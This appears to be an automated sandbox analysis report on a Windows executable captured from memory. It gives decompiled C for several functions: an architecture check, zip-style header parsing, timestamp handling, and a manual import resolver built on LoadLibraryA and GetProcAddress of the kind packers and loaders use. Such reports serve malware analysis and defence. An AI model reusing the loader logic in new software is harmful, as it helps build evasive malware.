Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::ios_base::_$ExceptionException@8Ios_base_dtorLockitLockit::_RaiseThrowTidystd::_
String ID: PMA$B
API String ID: 573322608-1475184249
Opcode ID: 412e1e3228ef3ea12a9ffb1160e715410a739836cd9d391aebcdbeec6319b0d3
Instruction ID: 241f85cf91724c2693ba34efd4cc909a0b253cbd5a8000611a3f40c797765d81
Opcode Fuzzy Hash: 412e1e3228ef3ea12a9ffb1160e715410a739836cd9d391aebcdbeec6319b0d3
Instruction Fuzzy Hash: B511ACB1A006189FE720DF49D841B9AF7F8FF05718F10865FE8119B781D7B8A905CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0040CB1A), ref: 0041ED9F
IsWow64Process.KERNEL32(00000000), ref: 0041EDA6

Strings

x64, xrefs: 0041EDB4
x86, xrefs: 0041EDBB

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Process$CurrentWow64
String ID: x64$x86
API String ID: 1905925150-1778291495
Opcode ID: 4a91d6d005265a4740a6aa70d0947793e000b57bb098a69ff9b9e2a0c02fd207
Instruction ID: e484fc72bbd673a78c4df2df0690528784cec73633dd3fbeb10b855355ecff3a
Opcode Fuzzy Hash: 4a91d6d005265a4740a6aa70d0947793e000b57bb098a69ff9b9e2a0c02fd207
Instruction Fuzzy Hash: D5D05B75501248EBEF10DFD5E80879B77ECD702355F10446BE805C7240E7799E04879A

Uniqueness

Uniqueness Score: -1.00%

Function 004194D0 Relevance: 6.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004194D0(void* __ecx) {
				signed char* _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				signed char* _v32;
				signed char* _v48;
				signed int _v49;
				char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t66;
				signed char _t69;
				void* _t72;
				signed char** _t74;
				signed int _t77;
				signed char** _t81;
				signed char* _t84;
				signed char* _t90;
				void* _t91;
				intOrPtr _t92;
				intOrPtr* _t102;
				char _t109;
				signed char** _t120;
				intOrPtr _t123;
				signed char** _t126;
				signed int _t128;
				void* _t130;
				intOrPtr _t131;
				signed char** _t135;
				signed int _t136;
				void* _t137;
				void* _t138;
				void* _t139;

				_push(0xffffffff);
				_push(E0043EE58);
				_push( *[fs:0x0]);
				_t138 = _t137 - 0x2c;
				_t65 =  *0x451f00; // 0xc21d6f0a
				_t66 = _t65 ^ _t136;
				_v20 = _t66;
				_push(_t91);
				_push(_t66);
				 *[fs:0x0] =  &_v16;
				_t130 = __ecx;
				_t69 =  *( *(__ecx + 0x20));
				_t119 = 0;
				if(_t69 == 0) {
					L3:
					__eflags =  *(_t130 + 0x54) - _t119;
					if( *(_t130 + 0x54) == _t119) {
						L25:
						_t70 = _t69 | 0xffffffff;
						__eflags = _t69 | 0xffffffff;
						L26:
						 *[fs:0x0] = _v16;
						_pop(_t123);
						_pop(_t131);
						_pop(_t92);
						return E0042A36A(_t70, _t92, _v20 ^ _t136, _t119, _t123, _t131);
					}
					_t102 =  *((intOrPtr*)(_t130 + 0x10));
					_t124 = _t130 + 0x48;
					__eflags =  *_t102 - _t130 + 0x48;
					if( *_t102 == _t130 + 0x48) {
						_t124 =  *((intOrPtr*)(_t130 + 0x3c));
						 *_t102 =  *((intOrPtr*)(_t130 + 0x3c));
						 *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x20)))) =  *((intOrPtr*)(_t130 + 0x40));
						__eflags = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x30)))) = 0;
					}
					__eflags =  *((intOrPtr*)(_t130 + 0x44)) - _t119;
					if(__eflags != 0) {
						_v28 = 0xf;
						_v32 = _t119;
						_v48 = _t119;
						_v8 = _t119;
						_t119 =  *(_t130 + 0x54);
						_push( *(_t130 + 0x54));
						_t72 = E0042D23E(_t91, _t124, _t130, __eflags);
						_t139 = _t138 + 4;
						__eflags = _t72 - 0xffffffff;
						if(_t72 == 0xffffffff) {
							L24:
							_t69 = E0040A450( &_v48);
							goto L25;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							E0040A5D0( &_v48, 1, _t72);
							_t74 = _v48;
							_t120 = _t74;
							__eflags = _v28 - 0x10;
							if(_v28 < 0x10) {
								_t120 =  &_v48;
								_t74 = _t120;
							}
							_t119 = _t120 + _v32;
							_t125 =  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x44))));
							_t96 =  &_v56;
							_t77 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x44)))) + 0x10))))(_t130 + 0x4c, _t74, _t120 + _v32,  &_v56,  &_v49,  &_v48,  &_v60);
							__eflags = _t77;
							if(_t77 < 0) {
								goto L24;
							}
							__eflags = _t77 - 1;
							if(_t77 <= 1) {
								__eflags = _v60 -  &_v49;
								if(_v60 !=  &_v49) {
									__eflags = _v28 - 0x10;
									_t126 = _v48;
									if(_v28 < 0x10) {
										_t126 =  &_v48;
									}
									_t128 = _t126 - _v56 + _v32;
									__eflags = _t128;
									if(__eflags <= 0) {
										L31:
										E0040A450( &_v48);
										_t70 = _v49 & 0x000000ff;
										goto L26;
									} else {
										goto L30;
									}
									do {
										L30:
										_t119 =  *(_t130 + 0x54);
										_t109 =  *((char*)(_t128 + _v56 - 1));
										_t128 = _t128 - 1;
										_push( *(_t130 + 0x54));
										_push(_t109);
										E0042D511(_t96, _t128, _t130, __eflags);
										_t139 = _t139 + 8;
										__eflags = _t128;
									} while (__eflags > 0);
									goto L31;
								}
								__eflags = _v28 - 0x10;
								_t81 = _v48;
								if(_v28 < 0x10) {
									_t81 =  &_v48;
								}
								_t119 = _v56 - _t81;
								__eflags = _v56 - _t81;
								E00404410( &_v48, 0, _v56 - _t81);
								L23:
								_push( *(_t130 + 0x54));
								_t72 = E0042D23E(_t96, _t125, _t130, __eflags);
								_t139 = _t139 + 4;
								__eflags = _t72 - 0xffffffff;
								if(_t72 != 0xffffffff) {
									continue;
								}
								goto L24;
							}
							__eflags = _t77 - 3;
							if(_t77 != 3) {
								goto L24;
							}
							__eflags = _v32 - 1;
							if(__eflags < 0) {
								goto L23;
							}
							__eflags = _v28 - 0x10;
							_t84 = _v48;
							if(_v28 < 0x10) {
								_t84 =  &_v48;
							}
							E0042DA0B( &_v49, 1, _t84, 1);
							E0040A450( &_v48);
							_t70 = _v49 & 0x000000ff;
							goto L26;
						}
						goto L24;
					} else {
						_push( *(_t130 + 0x54));
						_t69 = E0042D23E(_t91, _t124,  *(_t130 + 0x54), __eflags);
						__eflags = _t69 - 0xffffffff;
						if(_t69 == 0xffffffff) {
							goto L25;
						}
						_t70 = _t69 & 0x000000ff;
						goto L26;
					}
				}
				_t69 =  *( *(__ecx + 0x20));
				if(_t69 >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) + _t69) {
					goto L3;
				}
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
				_t135 =  *(__ecx + 0x20);
				_t90 =  *_t135;
				_t119 =  &(_t90[1]);
				 *_t135 =  &(_t90[1]);
				_t70 =  *_t90 & 0x000000ff;
				goto L26;
			}

0x004194d3
0x004194d5
0x004194e0
0x004194e1
0x004194e4
0x004194e9
0x004194eb
0x004194ee
0x004194f1
0x004194f5
0x004194fb
0x00419500
0x00419502
0x00419506
0x0041952f
0x0041952f
0x00419532
0x0041965f
0x0041965f
0x0041965f
0x00419662
0x00419665
0x0041966d
0x0041966e
0x0041966f
0x0041967d
0x0041967d
0x00419538
0x0041953b
0x0041953e
0x00419540
0x00419545
0x00419548
0x0041954d
0x00419552
0x00419554
0x00419554
0x00419556
0x00419559
0x00419578
0x0041957f
0x00419582
0x00419585
0x00419588
0x0041958b
0x0041958c
0x00419591
0x00419594
0x00419597
0x00419657
0x0041965a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041959d
0x0041959d
0x004195a3
0x004195ab
0x004195ae
0x004195b0
0x004195b3
0x004195b5
0x004195b8
0x004195b8
0x004195ba
0x004195c0
0x004195ce
0x004195db
0x004195dd
0x004195df
0x00000000
0x00000000
0x004195e1
0x004195e4
0x00419621
0x00419624
0x0041967e
0x00419682
0x00419685
0x00419687
0x00419687
0x0041968d
0x00419690
0x00419692
0x004196ae
0x004196b5
0x004196ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00419694
0x00419694
0x00419697
0x0041969a
0x0041969f
0x004196a0
0x004196a1
0x004196a2
0x004196a7
0x004196aa
0x004196aa
0x00000000
0x00419694
0x00419626
0x0041962a
0x0041962d
0x0041962f
0x0041962f
0x00419635
0x00419635
0x0041963d
0x00419642
0x00419645
0x00419646
0x0041964b
0x0041964e
0x00419651
0x00000000
0x00000000
0x00000000
0x00419651
0x004195e6
0x004195e9
0x00000000
0x00000000
0x004195eb
0x004195ef
0x00000000
0x00000000
0x004195f1
0x004195f5
0x004195f8
0x004195fa
0x004195fa
0x00419606
0x00419615
0x0041961a
0x00000000
0x0041961a
0x00000000
0x0041955b
0x0041955e
0x0041955f
0x00419567
0x0041956a
0x00000000
0x00000000
0x00419570
0x00000000
0x00419570
0x00419559
0x0041950b
0x00419516
0x00000000
0x00000000
0x0041951b
0x0041951d
0x00419520
0x00419522
0x00419525
0x00419527
0x00000000

APIs

_fgetc.LIBCMT ref: 0041955F
_fgetc.LIBCMT ref: 0041958C
_memcpy_s.LIBCMT ref: 00419606

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _fgetc$_memcpy_s
String ID:
API String ID: 160369518-0
Opcode ID: ad5fdfffd2c720358fbe5b10ba7601088186c7f6714ab646409648053dd8cb58
Instruction ID: e2fcd0bb3d3993600cb74ec748539e1f5bb383f3decf7bf6666394c8886e187a
Opcode Fuzzy Hash: ad5fdfffd2c720358fbe5b10ba7601088186c7f6714ab646409648053dd8cb58
Instruction Fuzzy Hash: AC619271D006189FCB25DBA8C8909EEB3B5FF48314F10892EE456A7280E739FD44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004089B0 Relevance: 6.2, APIs: 4, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004089B0(LONG* _a4) {
				LONG* _v8;
				LONG* _v12;
				intOrPtr _v16;
				char _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v128;
				char _v132;
				char _v136;
				void _v140;
				void* __edi;
				void* __esi;
				signed int _t44;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				intOrPtr _t49;
				signed int _t58;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				intOrPtr _t67;
				void* _t69;
				intOrPtr _t73;
				signed int _t83;
				void _t89;
				void* _t91;
				void* _t92;

				_t89 = _a4;
				_t83 = 0;
				if(_t89 != 0) {
					_v140 = 0;
					E0042A2F0( &_v136, 0, 0x7c);
					_t67 = E00406480(_t89);
					_t92 = _t91 + 0x10;
					__eflags = _t67 - 0xffffffff;
					if(_t67 == 0xffffffff) {
						L8:
						_t83 = _t83 | 0xffffffff;
						__eflags = _t83;
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t89 + 0x1c)) = _t67;
							goto L7;
						} else {
							__eflags =  *((char*)(_t89 + 1));
							if(__eflags == 0) {
								goto L8;
							} else {
								_t79 =  *(_t89 + 4);
								SetFilePointer( *(_t89 + 4),  *((intOrPtr*)(_t89 + 0xc)) + _t67, 0, 0);
								L7:
								_t63 = E00406320(_t79, __eflags, _t89,  &_a4);
								_t92 = _t92 + 8;
								__eflags = _t63;
								if(_t63 != 0) {
									goto L8;
								}
							}
						}
					}
					_v8 = 0;
					__eflags = _t83;
					if(__eflags == 0) {
						_t61 = E00406280(_t79, __eflags, _t89,  &_v8);
						_t92 = _t92 + 8;
						__eflags = _t61;
						if(_t61 != 0) {
							_t83 = _t83 | 0xffffffff;
							__eflags = _t83;
						}
					}
					_v12 = 0;
					__eflags = _t83;
					if(__eflags == 0) {
						_t79 =  &_v12;
						_t58 = E00406280( &_v12, __eflags, _t89,  &_v12);
						_t92 = _t92 + 8;
						__eflags = _t58;
						if(__eflags != 0) {
							L15:
							_t83 = _t83 | 0xffffffff;
							__eflags = _t83;
						} else {
							_t60 = E00406280( &_v12, __eflags, _t89,  &_v136);
							_t92 = _t92 + 8;
							__eflags = _t60;
							if(_t60 != 0) {
								goto L15;
							}
						}
					}
					_a4 = 0;
					__eflags = _t83;
					if(__eflags != 0) {
						L25:
						__eflags =  *((char*)(_t89 + 0x10));
						if( *((char*)(_t89 + 0x10)) != 0) {
							CloseHandle( *(_t89 + 4));
						}
						_push(_t89);
						E0042A289();
						__eflags = 0;
						return 0;
					} else {
						_t44 = E00406280(_t79, __eflags, _t89,  &_a4);
						_t92 = _t92 + 8;
						__eflags = _t44;
						if(_t44 != 0) {
							goto L25;
						} else {
							_t80 = _a4;
							__eflags = _a4 - _v136;
							if(_a4 != _v136) {
								goto L25;
							} else {
								__eflags = _v12 - _t44;
								if(_v12 != _t44) {
									goto L25;
								} else {
									__eflags = _v8 - _t44;
									if(__eflags != 0) {
										goto L25;
									} else {
										_t46 = E00406320(_t80, __eflags, _t89,  &_v108);
										_t92 = _t92 + 8;
										__eflags = _t46;
										if(__eflags != 0) {
											goto L25;
										} else {
											_t47 = E00406320(_t80, __eflags, _t89,  &_v104);
											_t92 = _t92 + 8;
											__eflags = _t47;
											if(__eflags != 0) {
												goto L25;
											} else {
												_t48 = E00406280( &_v132, __eflags, _t89,  &_v132);
												_t92 = _t92 + 8;
												__eflags = _t48;
												if(_t48 != 0) {
													goto L25;
												} else {
													_t49 =  *((intOrPtr*)(_t89 + 0xc));
													_t73 = _v104;
													_t82 = _t49 + _t67;
													_t85 = _v108 + _t73;
													__eflags = _t49 + _t67 - _v108 + _t73;
													if(_t49 + _t67 >= _v108 + _t73) {
														_v128 = _t49 - _v108 - _t73 + _t67;
														__eflags = 0;
														_v140 = _t89;
														_v112 = _t67;
														_v16 = 0;
														 *((intOrPtr*)(_t89 + 0xc)) = 0;
														_t69 = E0042BDF8(_t82, _t85, _t89, 0x80);
														memcpy(_t69,  &_v140, 0x20 << 2);
														E004069D0(_t69);
														return _t69;
													} else {
														goto L25;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					return 0;
				}
			}

0x004089ba
0x004089be
0x004089c2
0x004089d7
0x004089dd
0x004089e8
0x004089ea
0x004089ed
0x004089f0
0x00408a27
0x00408a27
0x00408a27
0x004089f2
0x004089f2
0x004089f5
0x00408a13
0x00000000
0x004089f7
0x004089f7
0x004089fb
0x00000000
0x004089fd
0x00408a00
0x00408a0b
0x00408a16
0x00408a1b
0x00408a20
0x00408a23
0x00408a25
0x00000000
0x00000000
0x00408a25
0x004089fb
0x004089f5
0x00408a2a
0x00408a31
0x00408a33
0x00408a3a
0x00408a3f
0x00408a42
0x00408a44
0x00408a46
0x00408a46
0x00408a46
0x00408a44
0x00408a49
0x00408a50
0x00408a52
0x00408a54
0x00408a59
0x00408a5e
0x00408a61
0x00408a63
0x00408a79
0x00408a79
0x00408a79
0x00408a65
0x00408a6d
0x00408a72
0x00408a75
0x00408a77
0x00000000
0x00000000
0x00408a77
0x00408a63
0x00408a7c
0x00408a83
0x00408a85
0x00408af2
0x00408af2
0x00408af6
0x00408afc
0x00408afc
0x00408b02
0x00408b03
0x00408b0d
0x00408b13
0x00408a87
0x00408a8c
0x00408a91
0x00408a94
0x00408a96
0x00000000
0x00408a98
0x00408a98
0x00408a9b
0x00408aa1
0x00000000
0x00408aa3
0x00408aa3
0x00408aa6
0x00000000
0x00408aa8
0x00408aa8
0x00408aab
0x00000000
0x00408aad
0x00408ab2
0x00408ab7
0x00408aba
0x00408abc
0x00000000
0x00408abe
0x00408ac3
0x00408ac8
0x00408acb
0x00408acd
0x00000000
0x00408acf
0x00408ad4
0x00408ad9
0x00408adc
0x00408ade
0x00000000
0x00408ae0
0x00408ae0
0x00408ae3
0x00408ae9
0x00408aec
0x00408aee
0x00408af0
0x00408b20
0x00408b23
0x00408b25
0x00408b2b
0x00408b2e
0x00408b31
0x00408b39
0x00408b49
0x00408b4b
0x00408b5b
0x00000000
0x00000000
0x00000000
0x00408af0
0x00408ade
0x00408acd
0x00408abc
0x00408aab
0x00408aa6
0x00408aa1
0x00408a96
0x004089c5
0x004089cb
0x004089cb

APIs

_memset.LIBCMT ref: 004089DD
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00408A0B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: FilePointer_memset
String ID:
API String ID: 1890419486-0
Opcode ID: 96b2a1b10641319aa3bcdc25cd6b33bad19f7c217eeeec2f43d9708ff98679bf
Instruction ID: 9491cd5d6e98b94c23346c0c5fcb531d73d151beb86e80068ab5c04490eebb60
Opcode Fuzzy Hash: 96b2a1b10641319aa3bcdc25cd6b33bad19f7c217eeeec2f43d9708ff98679bf
Instruction Fuzzy Hash: 5E510472A002145BDF20DE659D41BEF77A8AB40318F14417FEC58A36C1FB78AA49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00403E80 Relevance: 6.1, APIs: 4, Instructions: 135
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00403E80(void* __edi) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				intOrPtr _v16;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t39;
				signed int _t42;
				intOrPtr _t44;
				signed short _t45;
				CHAR* _t46;
				_Unknown_base(*)()* _t47;
				signed int _t49;
				intOrPtr* _t59;
				signed short* _t61;
				intOrPtr _t64;
				intOrPtr* _t69;
				struct HINSTANCE__* _t73;
				void* _t76;
				signed short* _t77;
				intOrPtr _t79;
				void* _t85;
				void* _t86;
				void* _t87;

				_t76 = __edi;
				_t37 =  *((intOrPtr*)(__edi + 0xc0));
				_t86 = _t85 - 0xc;
				if(_t37 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
					return 0;
				} else {
					_t59 =  *((intOrPtr*)(__edi + 0x144)) + _t37;
					_t39 =  *((intOrPtr*)(_t59 + 0xc));
					_push(_t77);
					_v8 = _t59;
					if(_t39 != 0) {
						while(1) {
							_t73 = LoadLibraryA( *((intOrPtr*)(_t76 + 0x144)) + _t39);
							_v12 = _t73;
							if(_t73 == 0) {
								break;
							}
							_t42 =  *(_t76 + 0x154);
							if( *(_t76 + 0x150) < _t42) {
								_t79 = _v16;
								goto L15;
							} else {
								if(_t42 == 0) {
									_t49 = 0x10;
								} else {
									_t49 = _t42 + _t42;
								}
								 *(_t76 + 0x154) = _t49;
								_t79 = E0042BDF8(_t49 * 4, _t76, _t77, _t49 * 4);
								_t87 = _t86 + 4;
								_v16 = _t79;
								if(_t79 == 0) {
									return 3;
								} else {
									_t52 =  *(_t76 + 0x150);
									if( *(_t76 + 0x150) != 0) {
										E0042B8D0(_t79,  *((intOrPtr*)(_t76 + 0x14c)), _t52 + _t52 + _t52 + _t52);
										_t87 = _t87 + 0xc;
									}
									E0042BE8C( *((intOrPtr*)(_t76 + 0x14c)));
									_t73 = _v12;
									_t86 = _t87 + 4;
									 *((intOrPtr*)(_t76 + 0x14c)) = _t79;
									L15:
									_t69 = _v8;
									 *(_t79 +  *(_t76 + 0x150) * 4) = _t73;
									 *(_t76 + 0x150) =  *(_t76 + 0x150) + 1;
									_t44 =  *((intOrPtr*)(_t76 + 0x144));
									_t77 =  *((intOrPtr*)(_t59 + 0x10)) + _t44;
									_t61 = _t77;
									if( *((intOrPtr*)(_t69 + 4)) == 0) {
										L18:
										_t45 =  *_t61;
										if(_t45 == 0) {
											L27:
											_t39 =  *((intOrPtr*)(_t69 + 0x20));
											_v8 = _t69 + 0x14;
											if(_t39 != 0) {
												_t59 = _v8;
												continue;
											} else {
												return _t39;
											}
										} else {
											L21:
											L21:
											if(_t45 >= 0) {
												_t46 = _t45 +  *((intOrPtr*)(_t76 + 0x144)) + 2;
											} else {
												_t46 = _t45 & 0x0000ffff;
											}
											_t47 = GetProcAddress(_t73, _t46);
											 *_t77 = _t47;
											if(_t47 == 0) {
												break;
											}
											_t45 = _t61[2];
											_t61 =  &(_t61[2]);
											_t77 =  &(_t77[2]);
											if(_t45 != 0) {
												_t73 = _v12;
												goto L21;
											} else {
												_t69 = _v8;
												goto L27;
											}
										}
									} else {
										_t64 =  *_t69;
										if(_t64 == 0) {
											return 8;
										} else {
											_t61 = _t64 + _t44;
											goto L18;
										}
									}
								}
							}
							goto L33;
						}
						return 6;
					} else {
						return _t39;
					}
				}
				L33:
			}

0x00403e80
0x00403e83
0x00403e89
0x00403e8e
0x00404001
0x00403ea1
0x00403ea8
0x00403eaa
0x00403ead
0x00403eae
0x00403eb3
0x00403ec3
0x00403ed2
0x00403ed4
0x00403ed9
0x00000000
0x00000000
0x00403edf
0x00403eeb
0x00403f56
0x00000000
0x00403eed
0x00403eef
0x00403ef5
0x00403ef1
0x00403ef1
0x00403ef1
0x00403f02
0x00403f0d
0x00403f0f
0x00403f12
0x00403f17
0x00403fe5
0x00403f1d
0x00403f1d
0x00403f25
0x00403f34
0x00403f39
0x00403f39
0x00403f43
0x00403f48
0x00403f4b
0x00403f4e
0x00403f59
0x00403f5f
0x00403f62
0x00403f65
0x00403f6e
0x00403f74
0x00403f7a
0x00403f7c
0x00403f86
0x00403f86
0x00403f8a
0x00403fc4
0x00403fc4
0x00403fca
0x00403fcf
0x00403ec0
0x00000000
0x00403fd5
0x00403fda
0x00403fda
0x00403f8c
0x00000000
0x00403f93
0x00403f95
0x00403fa2
0x00403f97
0x00403f97
0x00403f97
0x00403fa8
0x00403fae
0x00403fb2
0x00000000
0x00000000
0x00403fb4
0x00403fb7
0x00403fba
0x00403fbf
0x00403f90
0x00000000
0x00403fc1
0x00403fc1
0x00000000
0x00403fc1
0x00403fbf
0x00403f7e
0x00403f7e
0x00403f82
0x00403ff0
0x00403f84
0x00403f84
0x00000000
0x00403f84
0x00403f82
0x00403f7c
0x00403f17
0x00000000
0x00403eeb
0x00403ffb
0x00403eb5
0x00403eba
0x00403eba
0x00403eb3
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 00403ECC
_malloc.LIBCMT ref: 00403F08
_free.LIBCMT ref: 00403F43
GetProcAddress.KERNEL32(00000000,?), ref: 00403FA8

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressLibraryLoadProc_free_malloc
String ID:
API String ID: 4158704167-0
Opcode ID: 5055f9228945c81c19bdacdf835aad1e913d4cd42307d7dc88c8c8aa67f15eab
Instruction ID: 1df6f23de4a107db5795ef49efcb76a31e86d4737ad7be80283ec67d4a662a82
Opcode Fuzzy Hash: 5055f9228945c81c19bdacdf835aad1e913d4cd42307d7dc88c8c8aa67f15eab
Instruction Fuzzy Hash: B0414D71B016169BD714CE69D880BA6F7A8BB4430AF14427AEC0DD7341E739EE209BD4

Uniqueness

Uniqueness Score: -1.00%

Function 004271E0 Relevance: 6.1, APIs: 4, Instructions: 103
timeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004271E0(intOrPtr __ecx, intOrPtr __edi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				struct _FILETIME _v48;
				struct _FILETIME _v56;
				void* __ebx;
				void* __esi;
				signed int _t42;
				intOrPtr _t44;
				intOrPtr _t52;
				intOrPtr _t67;
				intOrPtr _t74;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t96;
				signed int _t97;

				_t95 = __edi;
				_t42 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t42 ^ _t97;
				_t44 = _a8;
				_t96 = __ecx;
				_t67 = _a4;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x84)) = _t67;
				 *((char*)(__ecx + 0x80)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x90)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x88)) = _t44;
				 *((intOrPtr*)(__ecx + 0x8c)) = 0;
				if(_t67 == 0 || _t44 == 0) {
					return E0042A36A(0x10000, 0, _v8 ^ _t97, _t86, _t95, _t96);
				} else {
					 *((intOrPtr*)(__ecx + 0x70)) = _t44;
					 *((intOrPtr*)(__ecx + 0x4c)) = 0x80000000;
					 *((char*)(__ecx + 0x6c)) = 1;
					GetLocalTime( &_v40);
					SystemTimeToFileTime( &_v40,  &_v48);
					_v56.dwLowDateTime = _v48.dwLowDateTime;
					_v56.dwHighDateTime = _v48.dwHighDateTime;
					FileTimeToSystemTime( &_v56,  &_v24);
					_t89 = _v48.dwHighDateTime;
					asm("sbb edx, 0x19db1de");
					_t52 = E0042CF60(_v48.dwLowDateTime - 0xd53e8000, _t89, 0x989680, 0);
					 *((intOrPtr*)(_t96 + 0x50)) = _t52;
					 *((intOrPtr*)(_t96 + 0x58)) = _t52;
					 *((intOrPtr*)(_t96 + 0x60)) = _t52;
					_t74 = _t89;
					 *((intOrPtr*)(_t96 + 0x5c)) = _t74;
					 *((intOrPtr*)(_t96 + 0x64)) = _t74;
					 *((intOrPtr*)(_t96 + 0x54)) = _t89;
					 *(_t96 + 0x68) = ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v24.wSecond + _v24.wSecond & 0x0000001f;
					return E0042A36A(0, 0, _v8 ^ _t97, ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v24.wSecond + _v24.wSecond & 0x0000001f, __edi, _t96);
				}
			}

0x004271e0
0x004271e6
0x004271ed
0x004271f0
0x004271f7
0x004271f9
0x004271fc
0x004271ff
0x00427205
0x0042720b
0x0042720e
0x00427214
0x00427217
0x0042721d
0x00427225
0x00427314
0x00427233
0x00427233
0x0042723a
0x00427241
0x00427245
0x00427253
0x00427262
0x0042726a
0x0042726d
0x00427276
0x00427285
0x0042728d
0x00427292
0x00427295
0x00427298
0x0042729e
0x004272a0
0x004272a3
0x004272ba
0x004272e9
0x004272fd
0x004272fd

APIs

GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00428DE3,?,0040A082), ref: 00427245
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00428DE3,?,0040A082), ref: 00427253
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00428DE3,?,0040A082), ref: 0042726D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042728D

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: 608da3d0891ad5776875216079f4f76712f552c7f8232879712c20e9bebe4d6f
Instruction ID: 24b3207fa27f9f64be3c5e505835bac6e9e0cc77f4751a0f2c300dcd7cdbb8e7
Opcode Fuzzy Hash: 608da3d0891ad5776875216079f4f76712f552c7f8232879712c20e9bebe4d6f
Instruction Fuzzy Hash: D2414C71A007189FDB18CFA9D490AAEFBF5FB88300F50852EE59AD7740DB70A904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00439F16 Relevance: 6.1, APIs: 4, Instructions: 103
